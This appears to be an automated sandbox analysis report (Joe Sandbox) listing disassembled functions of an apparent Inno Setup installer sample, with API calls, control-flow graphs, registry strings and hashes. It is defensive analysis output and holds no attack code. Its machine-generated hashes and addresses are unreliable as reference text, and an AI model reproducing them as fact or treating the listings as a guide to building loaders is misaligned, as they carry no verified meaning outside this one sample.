                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: unins$unins???.*
                                                                                      • API String ID: 3541575487-1009660736
                                                                                      • Opcode ID: b8508960964e18f228b5b6a455ee562c9244d5bac447fc9a6e43c63091bc2de7
                                                                                      • Instruction ID: efef7a00cc11a416bc55dd6669f4c7d8ef89bbc17b889cc882c0d169e59b9d03
                                                                                      • Opcode Fuzzy Hash: b8508960964e18f228b5b6a455ee562c9244d5bac447fc9a6e43c63091bc2de7
                                                                                      • Instruction Fuzzy Hash: A63113756012489FCB50EB65C981BDE77B9AF44304F5084B6A448AB3A2D738AF818B58
                                                                                      Function 00447F60 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,0044813D), ref: 00448080
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00448101
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 2574300362-0
                                                                                      • Opcode ID: d9787b66ae215e656ee415771d480fc3d32ddb8ef1add214a3308f413d75a1a6
                                                                                      • Instruction ID: 5c6eebc632780948e30306f747c70913dfebb380d33768fd88d962b889412947
                                                                                      • Opcode Fuzzy Hash: d9787b66ae215e656ee415771d480fc3d32ddb8ef1add214a3308f413d75a1a6
                                                                                      • Instruction Fuzzy Hash: CD515170A00105AFDB00EFA5C481AAFB7F9EB54315F10817FE814BB392DB389E458B99
                                                                                      Function 00451668 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004516CB,?,?,-00000001,00000000), ref: 004516A5
                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,004516CB,?,?,-00000001,00000000), ref: 004516AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 2ccb38690e6aaf115f3138c94c71e4fbb344a9e4605e64161c765321e8b078e6
                                                                                      • Instruction ID: 1035efb27f9b4b466a521b4d59d966f000d53702a43f221aaee312fb08fd4d5a
                                                                                      • Opcode Fuzzy Hash: 2ccb38690e6aaf115f3138c94c71e4fbb344a9e4605e64161c765321e8b078e6
                                                                                      • Instruction Fuzzy Hash: 9EF04931A00304BB8B10EB769C5159EB7ECDB4532571046BBFC14D32A2DA784D048458
                                                                                      Function 004084D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                                      • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                                      • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                                      • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                                      Function 00423AF4 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: f78a68ed826797f4bf69a42243cc74bd686c7ff48922d06499da9bfac42a5011
                                                                                      • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                      • Opcode Fuzzy Hash: f78a68ed826797f4bf69a42243cc74bd686c7ff48922d06499da9bfac42a5011
                                                                                      • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                      Function 00453F88 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID:
                                                                                      • API String ID: 2645101109-0
                                                                                      • Opcode ID: e5c4147ce8d30c90c427c53b97d0de2aa7d796d22412cffb07543fa3924af9c1
                                                                                      • Instruction ID: 1680b636b72d7d7da35d26ad3489112d7b5719c0f4c6eb10b1da13dd6a5c5f2b
                                                                                      • Opcode Fuzzy Hash: e5c4147ce8d30c90c427c53b97d0de2aa7d796d22412cffb07543fa3924af9c1
                                                                                      • Instruction Fuzzy Hash: CAD0C2B260420053C300AEA9AC82697769C8B84316F10483F7C85CA3C3E67CDB4C569A
                                                                                      Function 0042EEF4 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042EF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: 526567439b164cf8a1cedbeebbc24c6bfdc41ebf56c0565ee429dfc079ee367e
                                                                                      • Instruction ID: 914d3360e1f6a3e7d3a1e305f80b88d129d6a01b97e8a9d2bd08e0dbdb8f1123
                                                                                      • Opcode Fuzzy Hash: 526567439b164cf8a1cedbeebbc24c6bfdc41ebf56c0565ee429dfc079ee367e
                                                                                      • Instruction Fuzzy Hash: 16D0A77120010C7FCB00DE99D940C6F33AC9B88700BA0C805F508C7205C734EC1087B4
                                                                                      Function 0046AF80 Relevance: 68.7, APIs: 1, Strings: 38, Instructions: 412registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 46af80-46afb0 410 46afb2-46afb9 409->410 411 46afbb 409->411 412 46afc2-46affa call 403634 call 403738 call 42dcf8 410->412 411->412 419 46b015-46b03e call 403738 call 42dc1c 412->419 420 46affc-46b010 call 403738 call 42dcf8 412->420 428 46b040-46b049 call 46ac50 419->428 429 46b04e-46b077 call 46ad6c 419->429 420->419 428->429 433 46b089-46b08c call 403400 429->433 434 46b079-46b087 call 403494 429->434 437 46b091-46b0dc call 46ad6c call 42c36c call 46adb4 call 46ad6c 433->437 434->437 447 46b0f2-46b113 call 453f88 call 46ad6c 437->447 448 46b0de-46b0f1 call 46addc 437->448 455 46b115-46b168 call 46ad6c call 474c04 call 46ad6c call 474c04 call 46ad6c 447->455 456 46b169-46b170 447->456 448->447 455->456 458 46b172-46b1af call 474c04 call 46ad6c call 474c04 call 46ad6c 456->458 459 46b1b0-46b1b7 456->459 458->459 462 46b1f8-46b1fc 459->462 463 46b1b9-46b1f7 call 46ad6c * 3 459->463 465 46b1fe-46b209 call 47742c 462->465 466 46b20b-46b214 call 403494 462->466 463->462 476 46b219-46b3e6 call 403778 call 46ad6c call 47742c call 46adb4 call 403494 call 40357c * 2 call 46ad6c call 403494 call 40357c * 2 call 46ad6c call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c call 46adb4 call 47742c 465->476 466->476 553 46b3fc-46b40a call 46addc 476->553 554 46b3e8-46b3fa call 46ad6c 476->554 558 46b40f 553->558 559 46b410-46b438 call 46addc call 46ae10 call 46ad6c 554->559 558->559 565 46b43d-46b459 call 47742c call 46ae74 559->565 570 46b47f-46b486 565->570 571 46b45b-46b47e call 46addc * 2 565->571 573 46b4e0-46b4f6 RegCloseKey 570->573 574 46b488-46b4be call 48f434 570->574 571->570 574->573
                                                                                      APIs
                                                                                        • Part of subcall function 0046AD6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,00497154,?,0046B06F,?,00000000,0046B4F7,?,_is1), ref: 0046AD8F
                                                                                      • RegCloseKey.ADVAPI32(?,0046B4FE,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B549,?,?,00000001,00497154), ref: 0046B4F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValue
                                                                                      • String ID: " /SILENT$5.3.5 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                      • API String ID: 3132538880-4162757603
                                                                                      • Opcode ID: 74ada5f7f4b3b84f6d30dbb7f605c502c19f4e02ec6191c5605d87bebef11242
                                                                                      • Instruction ID: 6b8bd6052d7011f0313b6456d796e8b41d00091cb6ba677f30044cb60bcfab9c
                                                                                      • Opcode Fuzzy Hash: 74ada5f7f4b3b84f6d30dbb7f605c502c19f4e02ec6191c5605d87bebef11242
                                                                                      • Instruction Fuzzy Hash: DBF14374A001099BCB14EB55D8819AEB7B9EB44304F60C07BEC11AB7A5EB7CBD41CB5E
                                                                                      Function 0048CEA0 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 972 48cea0-48ced4 call 403684 975 48ceea-48cef7 call 403684 972->975 976 48ced6-48cee5 call 4469d0 Sleep 972->976 982 48cef9-48cf1c call 446a2c call 403738 FindWindowA call 446cac 975->982 983 48cf26-48cf33 call 403684 975->983 981 48d37a-48d394 call 403420 976->981 1001 48cf21 982->1001 991 48cf62-48cf6f call 403684 983->991 992 48cf35-48cf5d call 446a2c call 403738 FindWindowA call 446cac 983->992 999 48cfb8-48cfc5 call 403684 991->999 1000 48cf71-48cfb3 call 4469d0 * 4 SendMessageA call 446cac 991->1000 992->981 1009 48d014-48d021 call 403684 999->1009 1010 48cfc7-48d00f call 4469d0 * 4 PostMessageA call 446b04 999->1010 1000->981 1001->981 1021 48d070-48d07d call 403684 1009->1021 1022 48d023-48d06b call 4469d0 * 4 SendNotifyMessageA call 446b04 1009->1022 1010->981 1034 48d0aa-48d0b7 call 403684 1021->1034 1035 48d07f-48d0a5 call 446a2c call 403738 RegisterClipboardFormatA call 446cac 1021->1035 1022->981 1047 48d0f8-48d105 call 403684 1034->1047 1048 48d0b9-48d0f3 call 4469d0 * 3 SendMessageA call 446cac 1034->1048 1035->981 1060 48d14c-48d159 call 403684 1047->1060 1061 48d107-48d147 call 4469d0 * 3 PostMessageA call 446b04 1047->1061 1048->981 1073 48d15b-48d19b call 4469d0 * 3 SendNotifyMessageA call 446b04 1060->1073 1074 48d1a0-48d1ad call 403684 1060->1074 1061->981 1073->981 1085 48d1af-48d1cd call 446a2c call 42e1f0 1074->1085 1086 48d202-48d20f call 403684 1074->1086 1103 48d1df-48d1ed GetLastError call 446cac 1085->1103 1104 48d1cf-48d1dd call 446cac 1085->1104 1096 48d289-48d296 call 403684 1086->1096 1097 48d211-48d23d call 446a2c call 403738 call 4469d0 GetProcAddress 1086->1097 1109 48d298-48d2b9 call 4469d0 FreeLibrary call 446b04 1096->1109 1110 48d2be-48d2cb call 403684 1096->1110 1128 48d279-48d284 call 446b04 1097->1128 1129 48d23f-48d274 call 4469d0 * 2 call 446cac call 446b04 1097->1129 1115 48d1f2-48d1fd call 446cac 1103->1115 1104->1115 1109->981 1125 48d2cd-48d2eb call 446a2c call 403738 CreateMutexA 1110->1125 1126 48d2f0-48d2fd call 403684 1110->1126 1115->981 1125->981 1136 48d2ff-48d331 call 487218 call 403574 call 403738 OemToCharBuffA call 487230 1126->1136 1137 48d333-48d340 call 403684 1126->1137 1128->981 1129->981 1136->981 1149 48d342-48d374 call 487218 call 403574 call 403738 CharToOemBuffA call 487230 1137->1149 1150 48d376 1137->1150 1149->981 1150->981
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000,00000000,0048D395,?,?,?,?,00000000,00000000,00000000), ref: 0048CEE0
                                                                                      • FindWindowA.USER32(00000000,00000000), ref: 0048CF11
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindSleepWindow
                                                                                      • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                      • API String ID: 3078808852-3310373309
                                                                                      • Opcode ID: fab8a4fe477002bc53f13639ab52b518f0439af39f0fe01b7890694e2865f2f1
                                                                                      • Instruction ID: b0d844213b24b695988cfb35ecebf8c704e926cd3cc1ee44f2907765548c277e
                                                                                      • Opcode Fuzzy Hash: fab8a4fe477002bc53f13639ab52b518f0439af39f0fe01b7890694e2865f2f1
                                                                                      • Instruction Fuzzy Hash: 36C161A0B0461067D714BE3E9C4261E569A9F89704B11D93FB406EB7CACE7DDC06439E
                                                                                      Function 0047E1E8 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1479 47e1e8-47e20d GetModuleHandleA GetProcAddress 1480 47e274-47e279 GetSystemInfo 1479->1480 1481 47e20f-47e225 GetNativeSystemInfo GetProcAddress 1479->1481 1482 47e27e-47e287 1480->1482 1481->1482 1483 47e227-47e232 GetCurrentProcess 1481->1483 1484 47e297-47e29e 1482->1484 1485 47e289-47e28d 1482->1485 1483->1482 1490 47e234-47e238 1483->1490 1489 47e2b9-47e2be 1484->1489 1487 47e2a0-47e2a7 1485->1487 1488 47e28f-47e293 1485->1488 1487->1489 1491 47e295-47e2b2 1488->1491 1492 47e2a9-47e2b0 1488->1492 1490->1482 1493 47e23a-47e241 call 451324 1490->1493 1491->1489 1492->1489 1493->1482 1497 47e243-47e250 GetProcAddress 1493->1497 1497->1482 1498 47e252-47e269 GetModuleHandleA GetProcAddress 1497->1498 1498->1482 1499 47e26b-47e272 1498->1499 1499->1482
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047E1F9
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047E206
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047E214
                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047E21C
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047E228
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047E249
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047E25C
                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047E262
                                                                                      • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047E279
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                      • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                      • API String ID: 2230631259-2623177817
                                                                                      • Opcode ID: 4e477b3967b851c9eac5dc78f32453af4a94d1867c0ed92fe90c0839294704c9
                                                                                      • Instruction ID: 2d47f8cf15d4e27fa0f1176fe36efced94cd1240a4270aaae3bb705869ea135a
                                                                                      • Opcode Fuzzy Hash: 4e477b3967b851c9eac5dc78f32453af4a94d1867c0ed92fe90c0839294704c9
                                                                                      • Instruction Fuzzy Hash: 6E11B155104741A4DA1073B79D45FEB164C8B09718F188BFB6C8CA62D3D67CC84996BF
                                                                                      Function 00465560 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1500 465560-465598 call 47742c 1503 46559e-4655ae call 47426c 1500->1503 1504 46577a-465794 call 403420 1500->1504 1509 4655b3-4655f8 call 40785c call 403738 call 42dc54 1503->1509 1515 4655fd-4655ff 1509->1515 1516 465605-46561a 1515->1516 1517 465770-465774 1515->1517 1518 46562f-465636 1516->1518 1519 46561c-46562a call 42db84 1516->1519 1517->1504 1517->1509 1521 465663-46566a 1518->1521 1522 465638-46565a call 42db84 call 42db9c 1518->1522 1519->1518 1524 4656c3-4656ca 1521->1524 1525 46566c-465691 call 42db84 * 2 1521->1525 1522->1521 1541 46565c 1522->1541 1527 465710-465717 1524->1527 1528 4656cc-4656de call 42db84 1524->1528 1544 465693-46569c call 474cf8 1525->1544 1545 4656a1-4656b3 call 42db84 1525->1545 1530 465752-465768 RegCloseKey 1527->1530 1531 465719-46574d call 42db84 * 3 1527->1531 1542 4656e0-4656e9 call 474cf8 1528->1542 1543 4656ee-465700 call 42db84 1528->1543 1531->1530 1541->1521 1542->1543 1543->1527 1553 465702-46570b call 474cf8 1543->1553 1544->1545 1545->1524 1557 4656b5-4656be call 474cf8 1545->1557 1553->1527 1557->1524
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,0046577A,?,?,00000001,00000000,00000000,00465795,?,00000000,00000000,?), ref: 00465763
                                                                                      Strings
                                                                                      • Inno Setup: App Path, xrefs: 00465622
                                                                                      • Inno Setup: Icon Group, xrefs: 0046563E
                                                                                      • Inno Setup: Selected Components, xrefs: 00465682
                                                                                      • Inno Setup: Setup Type, xrefs: 00465672
                                                                                      • Inno Setup: Deselected Tasks, xrefs: 004656F1
                                                                                      • Inno Setup: User Info: Organization, xrefs: 00465732
                                                                                      • Inno Setup: Deselected Components, xrefs: 004656A4
                                                                                      • Inno Setup: No Icons, xrefs: 0046564B
                                                                                      • Inno Setup: User Info: Name, xrefs: 0046571F
                                                                                      • %s\%s_is1, xrefs: 004655DD
                                                                                      • Inno Setup: User Info: Serial, xrefs: 00465745
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004655BF
                                                                                      • Inno Setup: Selected Tasks, xrefs: 004656CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                      • API String ID: 47109696-1093091907
                                                                                      • Opcode ID: 94c9d62fb1d7e435db0e42792cab2a1aa0121b794f6c09036552146ff74fe873
                                                                                      • Instruction ID: 8cdb4376706b2a9b24b9b35df1ecfc56159c4b319484bfede528e66c14f5fdf6
                                                                                      • Opcode Fuzzy Hash: 94c9d62fb1d7e435db0e42792cab2a1aa0121b794f6c09036552146ff74fe873
                                                                                      • Instruction Fuzzy Hash: 4951B630A00B04DBCB11EB65D951BDEBBF5EF84304F5084BAE845A7391E738AE05CB59
                                                                                      Function 004237E4 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1718 4237e4-4237ee 1719 423917-42391b 1718->1719 1720 4237f4-423816 call 41f334 GetClassInfoA 1718->1720 1723 423847-423850 GetSystemMetrics 1720->1723 1724 423818-42382f RegisterClassA 1720->1724 1726 423852 1723->1726 1727 423855-42385f GetSystemMetrics 1723->1727 1724->1723 1725 423831-423842 call 408c24 call 40311c 1724->1725 1725->1723 1726->1727 1729 423861 1727->1729 1730 423864-4238c0 call 403738 call 406300 call 403400 call 4235bc SetWindowLongA 1727->1730 1729->1730 1741 4238c2-4238d5 call 4240e8 SendMessageA 1730->1741 1742 4238da-423908 GetSystemMenu DeleteMenu * 2 1730->1742 1741->1742 1742->1719 1744 42390a-423912 DeleteMenu 1742->1744 1744->1719
                                                                                      APIs
